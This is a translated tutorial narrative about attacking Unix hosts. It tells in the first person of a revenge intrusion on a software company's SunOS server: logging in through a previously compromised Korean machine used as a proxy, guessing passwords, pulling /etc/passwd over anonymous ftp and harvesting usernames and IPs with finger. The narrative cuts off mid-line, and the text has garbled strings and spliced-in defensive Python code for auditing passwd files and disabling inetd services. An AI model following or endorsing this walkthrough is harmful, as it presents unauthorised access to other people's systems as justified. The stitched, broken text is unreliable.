Unix system attacks and Prevention

Source: Internet
Author: User
Tags: root access

§. Preface

This article is aimed at friends who are interested in network security but are not yet familiar with intrusion into, and defence of, Unix hosts. It walks through an attack on a Unix host and describes how to defend such hosts effectively.

§. Unix features

The popularity of Unix is no accident; it follows from the outstanding characteristics of Unix itself:
1. Strong portability;
2. The ability to start asynchronous processes;
3. Consistent I/O for files, devices and processes;
4. A hierarchical file system;
5. The default shell can be replaced by another shell;
6. True multi-user, multi-tasking operation.

Note that a Unix system has two common kinds of users: the root user and ordinary users.

1. root (the superuser)

This is the superuser account; with it you can perform every operation on the system. Obtaining root access is also the ultimate goal an attacker pursues.

2. Ordinary users

Ordinary user accounts are created by root, each with the specific permissions root grants it, and there can be several levels of them. Attackers usually try to get into the system through such an account first, as the following example shows.

§. Examples of attacks on Unix systems

That was a quick refresher on Unix. Now let's put the knowledge to the test. Our attack platform is a workstation running Red Hat 6.0 (kernel 2.2.5-15) (of course, you can also try it from Win9x/Win2000!).

Disclaimer: the target hosts in this article have the IP addresses 202.202.0.8, 202.103.10.110 and 211.50.33.117. These addresses were made up by me; if a real host happens to exist at one of them, that is pure coincidence.

Start!

"It crashed again! What kind of rubbish is this? No!" I pounded the keyboard in anger. "And they call it fully intelligent software ...... 'to give you an immersive experience' ...... utter nonsense!" I roared. The English-learning software I had bought a few days earlier crashed constantly, had cost me RMB xxx, and left me feeling thoroughly cheated. "You swindlers, I'll teach you a lesson so you stop deceiving people!" I shouted angrily, and copied the "swindlers'" software company website, www.shitsoft.com.cn, from the box. Nothing more that night.

The next day. I was busy from early morning and didn't get a free moment until noon, after lunch. Everyone was so sleepy they were ready to doze off. Then I sat down at my Red Hat box and began the punishment of justice ......

First, find a proxy so that a reverse lookup won't catch me. ^_^ I wonder whether the Korean "rooster" is still around? Let's try:

bash# telnet 211.50.33.117
Red Hat Linux release 6.2 (Goozer)
Kernel 2.2.14-5.0 on an i686
login: crossbow
Password:
bash$

OK! It still works. Still usable even though I haven't looked at it for so long! The Korean administrator is really "good". ^_^ Ping our target to see what it looks like:

bash$ pwd
/home/crossbow
bash$ ping www.shitsoft.com.cn
Pinging www.shitsoft.com.cn [202.202.0.8] with 32 bytes of data:
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Ping statistics for 202.202.0.8:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

The speed isn't bad. The IP address belongs to a China Education Network machine, and judging from the TTL it is probably a Unix box. Verify:

bash$ telnet 202.202.0.8
SunOS 5.6
login:

It's a rotten old SunOS 5.6 machine. First, let's guess:

login: adm
Password:
Login incorrect
login: oracle
Password:
Login incorrect
login: ftp
Password:
Login incorrect
^C

Damn! Bad luck today, I didn't guess a single one. :-( Use messala to scan for CGI vulnerabilities: (skipping the tedious scanning process) ............ Result: no holes! :-( This administrator is very diligent ...... I'll have to use nss to see what services it is running! ............ Luckily the telnet, ftp and finger ports are open! Pai_^ First check whether there is an anonymous ftp account:

bash$ ftp 202.202.0.8
Connected to 202.202.0.8.
220 Cool FTP server (Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name (202.202.0.8:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Welcome, archive user!
............
............
............
ftp>

Good, the anonymous ftp service hasn't been disabled. We can use the anonymous account! Quickly grab its passwd:

ftp> ls
............
bin boot etc dev home lib usr proc lost+found root sbin src tmp usr var
............
ftp> cd /etc
............
ftp> ls *passwd*
............
passwd
passwd-
............

Could it really be this easy? Take a look:

ftp> cat passwd | more
............
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20:/export/home/dennis:/bin/sh
walter:x:1001:100:/export/home/walter:/bin/sh
power:x:9589:101:/export/home/power:/bin/sh
deal:x:1035:20:/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101:/export/home/render:/bin/sh
............

Bad luck, it's an empty passwd (no hashes)! Look at the backup:

ftp> cat passwd- | more
............
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20:/export/home/dennis:/bin/sh
walter:x:1001:100:/export/home/walter:/bin/sh
power:x:9589:101:/export/home/power:/bin/sh
deal:x:1035:20:/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101:/export/home/render:/bin/sh
............

No, it's the same! Check whether a shadow file exists:

ftp> ls *shadow*
............
shadow
shadow-
............

Haha, passwd is usually empty because the password hashes are kept in shadow!

ftp> cat shadow | more
............
[sh$ cat shadow | more]: Permission denied
............

Can't read it. Try the backup file:

ftp> cat shadow- | more
............
[sh$ cat shadow- | more]: Permission denied
............

Both the same! Damn! I'll have to settle for grabbing the empty passwd. Having the usernames is better than nothing:

ftp> get passwd
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8 Kbytes/s)
ftp> bye
221 Goodbye.
bash$
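The passwd listing pulled over anonymous ftp above is exactly what an administrator should be auditing before an outsider does. The following is an added example, not code from the original article: it parses a constructed copy of the Solaris-style entries quoted above (with the empty GECOS field restored on the user lines, which the scrape appears to have dropped) and reports the things a defender cares about: malformed lines (note the `ftp` entry, which has no password field at all), hashes or empty passwords sitting in the world-readable passwd, extra UID-0 accounts, duplicate UIDs, and which accounts can actually log in. One caveat it encodes: on Solaris an empty shell field does not mean "no login"; it means the default `/usr/bin/sh`, so system accounts such as `daemon` and `bin` rely entirely on their locked entry in shadow.

```python
"""Audit /etc/passwd entries from a defender's point of view.

Added example, not code from the original article.  SAMPLE_PASSWD is a
constructed copy of the Solaris-style listing quoted in the article.
"""
from typing import Dict, List

# Constructed sample modelled on the listing quoted in the article.
SAMPLE_PASSWD = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
"""

# Shells that refuse an interactive login.  An EMPTY shell field is deliberately
# not in this set: on Solaris it means "use the default /usr/bin/sh".
NOLOGIN_SHELLS = {"/bin/false", "/usr/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

# Password-field values that mean "no hash here" (shadowed or locked).
PLACEHOLDER_PW = {"x", "*", "!", "!!", "NP", "*LK*"}


def audit_passwd(text: str) -> Dict[str, List]:
    """Return findings keyed by check name; each value lists the account names hit."""
    findings: Dict[str, List] = {
        "malformed": [],        # wrong field count or non-numeric uid
        "hash_in_passwd": [],   # real hash in the world-readable file
        "empty_password": [],   # passwordless login
        "extra_uid0": [],       # uid 0 under a name other than root
        "duplicate_uid": [],    # (name, earlier name) pairs sharing a uid
        "default_shell": [],    # empty shell field: default shell, still logs in
        "interactive": [],      # explicit login shell
    }
    seen_uid: Dict[int, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings["malformed"].append(fields[0])
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if pw == "":
            findings["empty_password"].append(name)
        elif pw not in PLACEHOLDER_PW and not pw.startswith(("*", "!")):
            findings["hash_in_passwd"].append(name)
        try:
            uid_n = int(uid)
        except ValueError:
            findings["malformed"].append(name)
            continue
        if uid_n == 0 and name != "root":
            findings["extra_uid0"].append(name)
        if uid_n in seen_uid:
            findings["duplicate_uid"].append((name, seen_uid[uid_n]))
        else:
            seen_uid[uid_n] = name
        if shell == "":
            findings["default_shell"].append(name)
        elif shell not in NOLOGIN_SHELLS:
            findings["interactive"].append(name)
    return findings


def report(text: str) -> str:
    """Human-readable summary, one line per check that produced a finding."""
    lines = []
    for check, hits in audit_passwd(text).items():
        if hits:
            lines.append(f"{check}: {', '.join(map(str, hits))}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_PASSWD))
```

Run against the sample it flags `ftp` as malformed and lists the nine accounts with an explicit shell; the "interactive" list minus root and the uucp transfer account is the same set of seven names the narrative settles on, which is the point: anything an anonymous ftp client can read, the administrator should have read first.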

After studying it, apart from the root account and the disabled accounts there are seven usable accounts: dennis, walter, power, deal, jessica, smith and render. They are our last hope of getting into the host. Pai_^ finger!

bash$ finger @202.202.0.8
[202.202.0.8]
Login     Name           TTY     Idle   When   Where
daemon    ???                    <...>
bin       ???                    <...>
sys       ???                    <...>
walter    Walter Wan     pts/0                 202.202.0.114
dennis    Dennis Lee     437 888wnet.net
power     Power xion     0000                  202.202.0.10
deal      H Wang         pts/2                 202.202.0.11
admin     ???                    <...>
jessica   Jessica Xiao   pts/0                 202.202.0.9
smith     Smi
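The finger output above hands out, without any password, the valid login names, who is logged in, and the addresses of their workstations; together with the open telnet and ftp ports found earlier it is what makes the guessing game worthwhile. The services all live in inetd on a SunOS 5.6 host, so the fix is a configuration one. The following is an added example, not code from the original article: it reads a constructed `inetd.conf` in the SunOS 5.x `/etc/inet/inetd.conf` format, lists which of finger, telnet and ftp are still enabled, and writes out the hardened version with those lines commented out and the reason recorded beside each.

```python
"""Find and disable the inetd services the story relies on.

Added example, not code from the original article.  SAMPLE_INETD_CONF is a
constructed fragment in the SunOS 5.x /etc/inet/inetd.conf format.
"""
from typing import Dict, List

# Constructed sample modelled on a stock Solaris 2.x inetd.conf.
SAMPLE_INETD_CONF = """\
# constructed /etc/inet/inetd.conf sample
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd       in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd    in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd    in.fingerd
#shell  stream  tcp     nowait  root    /usr/sbin/in.rshd       in.rshd
time    stream  tcp     nowait  root    internal
"""

# The services the article's attacker leaned on, with the reason each is a risk.
RISKY_SERVICES: Dict[str, str] = {
    "finger": "discloses valid login names, idle times and client addresses",
    "telnet": "carries the password in cleartext; use ssh",
    "ftp": "cleartext password and, if anonymous, possible file disclosure",
}


def enabled_services(conf: str) -> List[str]:
    """Service names of every line that is not blank or commented out."""
    names = []
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        names.append(line.split()[0])
    return names


def risky_enabled(conf: str) -> Dict[str, str]:
    """Enabled services that appear in RISKY_SERVICES, mapped to the reason."""
    return {s: RISKY_SERVICES[s] for s in enabled_services(conf) if s in RISKY_SERVICES}


def harden(conf: str) -> str:
    """Return the config with every risky service commented out and annotated."""
    out = []
    for raw in conf.splitlines():
        line = raw.strip()
        name = line.split()[0] if line and not line.startswith("#") else None
        if name in RISKY_SERVICES:
            out.append(f"# disabled ({RISKY_SERVICES[name]}):")
            out.append("#" + raw)
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for svc, why in risky_enabled(SAMPLE_INETD_CONF).items():
        print(f"enabled: {svc:8s} {why}")
    print(harden(SAMPLE_INETD_CONF))
```

On Solaris 2.x the live file is `/etc/inet/inetd.conf` (`/etc/inetd.conf` points to it); after editing it, inetd must be sent SIGHUP so it rereads the file. Commenting finger out removes the account list and workstation addresses from the picture entirely, and replacing telnet and ftp with ssh/scp removes the cleartext logins the rest of the story depends on. `harden` is idempotent, so it can be run safely on a file that has already been cleaned.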
